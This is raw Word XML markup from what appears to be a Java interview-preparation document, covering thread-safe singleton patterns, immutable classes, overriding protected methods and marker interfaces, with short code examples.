    <w:p w14:paraId="2F81170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5DA69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D8F8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090F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49554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D5B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FC8B5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A1B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97D5B8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E4BE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02387C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 to show functionality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1DD95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7502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713A73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0ECBA6" w14:textId="7249D77B"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C44042"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Threads Accessing Singleton</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE4273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7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FEF0FA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38D41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ach thread gets the Singleton instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2D15F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18B0E45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5534092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04EE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EFA1B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1B293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81C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9992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two threads that will access the Singleton</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB5AB1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16723C9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378C655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019BD8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first thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16890A5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second thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225D54D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870FD6" w14:textId="1F3E3E7C"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D4DFAB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the Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2397070F"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Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F68B1C"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Instance() method implements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howMessage() method is a sample method to demonstrate functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5732BCA8"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Example Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507C5CE9"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in Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DCAE50"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ected Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BC6B3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056976EC"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3A03E4B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 Consideration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426A4E6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bove code, th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is thread-safe due to the following reasons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034E5395"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This ensures that changes to the instance are visible to all threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04938C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2B73921A"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threads then print the message using the Singleton instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D647F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amp; Space Complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6492A5C4"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ace Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: O(1) because only one instance of the Singleton is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161CFF2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3E55579" w14:textId="4DF36578" w:rsidR="0029340F" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701" w:rsidP="001222A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implementing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68" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36536759" w14:textId="6BD04655" w:rsidR="004568BC" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc197867258"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to implement thread safety in java using singleton</w:t>
      </w:r>
      <w:r w:rsidR="004568BC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="42E10546" w14:textId="612EBC8F" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61" w:rsidP="00DC1C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Thread-Safe by Default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464A22B7"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A054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instance is created eagerly when the class is loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A995B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42E253C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6E4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6E55A53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AF103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0D9F2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569EF26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660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77CEE0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403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BC472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335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1038C83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6079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p>
    <w:p w14:paraId="7E3E711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84760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02D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C3A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6D1D8CA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21AAC7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EDCCB9" w14:textId="5DFCA53D"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5D3949"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7D6BA27F"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with Double-Checked Locking (Thread-Safe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186C675E"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create the Singleton instance lazily (only when it's needed), you can us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CFB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olatile keyword ensures visibility of the instance across all threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054880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968B2A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9A44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313F1C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E2CE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7EC10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to ensure thread safety during lazy initialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC06BE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883D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794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30E76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heck to avoid creating more than one instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7629177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75A5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950145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DE0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3836E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FB6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E398F1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3456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F0F05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405B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34F76C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FADA5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p>
    <w:p w14:paraId="3C962A1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D9BE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652C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3A9F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51B34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1FC39E6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9E6E49" w14:textId="68334150"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B6A899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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312C5B50"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Recommended Approach)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F21B053"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ill Pugh Singleton Design takes advantage of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java class loader mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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BF81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ner static class responsible for creating Singleton instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512A2B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E0C1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ngleton instance is created when the class is loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B293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6DD1FB8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AB5C4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011CB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0DB66B8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8AB0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53A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4F39D0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F13E9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7CFA72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F574A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88D2C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A16C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B18698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DB8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p>
    <w:p w14:paraId="6A12AD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30F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5B26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E9252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3742406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03AE5C7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091579" w14:textId="19848439"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D6297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4601AD52"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static class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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is initialized lazily, and the class loader ensures that the INSTANCE is created in a thread-safe manner when the class is loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75827E2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Initialization-on-demand holder idiom</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Thread-Safe by Default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2CF2D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E33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41F95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BC42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access the Singleton instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734234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D949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23D9AD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134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t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DCBD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5313B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8F4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07C5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08EE5B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3B31D9C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797F5" w14:textId="0A68AE12"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3EFB9225"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22792C"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p w14:paraId="63262D2F"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p w14:paraId="4AA05A50"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Simple and thread-safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B57AAB"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with Double-Checked Locking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D85FE04"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and instance is created only when needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786ED995"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 Design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0211AEB7"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Slightly more complex due to the inner static class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D37C3DB"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with Enum:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F619F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A5DCFBF"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ill Pugh Singleton Desig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the most efficient and thread-safe ways to implement a Singleton pattern in Java. The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approach is the simplest and most effective, while the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Bill Pugh</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> design is highly recommended for lazy initialization and thread safety.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69" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3202CC" w14:textId="6382D41A" w:rsidR="004568BC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CB3525">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc197867259"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Write an immutable class in Java</w:t>
      </w:r>
      <w:r w:rsidR="004568BC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="14B7DA29" w14:textId="72EF1531" w:rsidR="00336ED2" w:rsidRPr="00CE4B95" w:rsidRDefault="00336ED2" w:rsidP="00191998">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="156B71E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p>
    <w:p w14:paraId="55FD098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p>
    <w:p w14:paraId="67624CE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C950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F05D6"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serialVersionU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L</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666FD51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E678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9E5E11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42F9C4D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0300510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p>
    <w:p w14:paraId="3E306D5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DFF54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Employee object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D2997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57165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E000D5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30BF234"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C57B8E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protect mutable Date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5DC4F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594C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E7533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 for the fields (no setters to ensure immutability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656F579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801F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D346F2B"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99B40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9CC15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B315E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F5C283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7EC18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D26CA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FD12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727E11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F32F69"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E92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ge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05A36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avoid external modification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735941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17F268" w14:textId="4C89F661"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDBE18E" w14:textId="77777777" w:rsidR="00FC7B07" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7B07" w:rsidP="00D627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468D73B"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r w:rsidRPr="00CE4B95">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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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CE4B95"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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5873221F" w14:textId="43F1EAC1" w:rsidR="004568BC" w:rsidRPr="00CE4B95" w:rsidRDefault="005C1948">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc197867260"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we override the protected method</w:t>
      </w:r>
      <w:r w:rsidR="004568BC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="4EB72CD1" w14:textId="61A438B1" w:rsidR="00461FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="00461FF9" w:rsidP="00AB7C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protected Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690477E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a Protected Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE53AC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7521D30"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the same package</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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a different package</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the subclass is in a different package, the protected method can still be overridden, but the access level of the overridden method must be at least protected. It cannot be made more restrictive (e.g., turning it into private), but it can be made more permissive (e.g., turning it into public).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60025596"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Overriding protected method within the same package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA3C2A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346F30D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1C6C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249BB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62775F6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93BFA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772CE75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B5291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Subclass in the same package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F526E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E2287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3707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2FD0F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rotected method in Child"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716FA91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B75EC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0CBCD13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B1FBC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5A76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3587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3F264684"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rotected method in Child</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6C1C1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E6A854" w14:textId="534FDEE8"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482B3B"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Overriding protected method in a different package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F2B7F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Parent class (In package p1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8850D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6E92980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8DF46C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AAC1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D674A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434514B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395EB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F46ED2"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4C594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Subclass (In package p2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0A2E0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49544D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7E0A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37678A08"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27215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369E3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60396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 increase the visibility to public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2287490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ublic method in Child"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B09BA9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7B79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7D5A6D3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1E0AF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9864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564A7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1E749260"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ublic method in Child</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7920351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46F953" w14:textId="6AC502FE"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6B91819"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s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DE5B1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is allowed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can override a protected method in a subclass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5A2DD2"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 Rule</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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you can override a protected method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Pr="00CE4B95"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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70256359" w14:textId="7DF47D0E" w:rsidR="00946676" w:rsidRPr="00CE4B95" w:rsidRDefault="009C6B66">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc197867261"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is marker interface in java? What is the purpose of the marker interface</w:t>
      </w:r>
      <w:r w:rsidR="00946676" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="5AC7B8CD" w14:textId="36A80CC8" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001C4545">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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What is a Marker Interface in Java?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0965B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a Marker Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EE5EA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Marker interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B30E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02E227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or fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EC4B9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p>
    <w:p w14:paraId="781C304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6C74EEE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Class that implements the marker interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFD857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yClass</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4F5B14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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> id</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609D8C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71AC0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7845B6A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Getters and Setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37284C2B" w14:textId="6D1C2751"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r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D9CFD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 Serializable is a marker interface. It does not contain any methods, but a class that implements it (like MyClass) is considered to have a special behavior related to serialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F074147"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Purpose of Marker Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245FEFED"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dicating a special behavior or property</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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lastRenderedPageBreak/>
        <w:t>Enabling custom handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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 operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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Using Marker Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127D8F9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Marker interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F95EF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ABD8A9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here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547AA0B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F7563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5574349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Class implementing the marker interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6612AFE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5F3982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D20B21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email</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5DC0F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49C00FE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Constructor, Getters, Setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682E104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4A32DF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CABF00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Validator class that checks if an object is validatable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B23D22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840D51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validate</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> obj</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A3BA7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if</w:t>
      </w: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obj </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>instanceof</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D92D2F2"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validatable."</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B3594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els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F7561B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NOT validatable."</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5533AB8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3A47933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6E84C0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8BA4DB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E451C4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ain</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C5AE11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stat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main</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</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25799DD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use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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A86E2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validato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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6996F1CF"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validator</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>validate</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user</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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Output: This object is validatable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC7870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BA6AB5D" w14:textId="51F90C5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33474C0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513C617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able interface is a marker interface.</w:t>
      </w:r>
    </w:p>
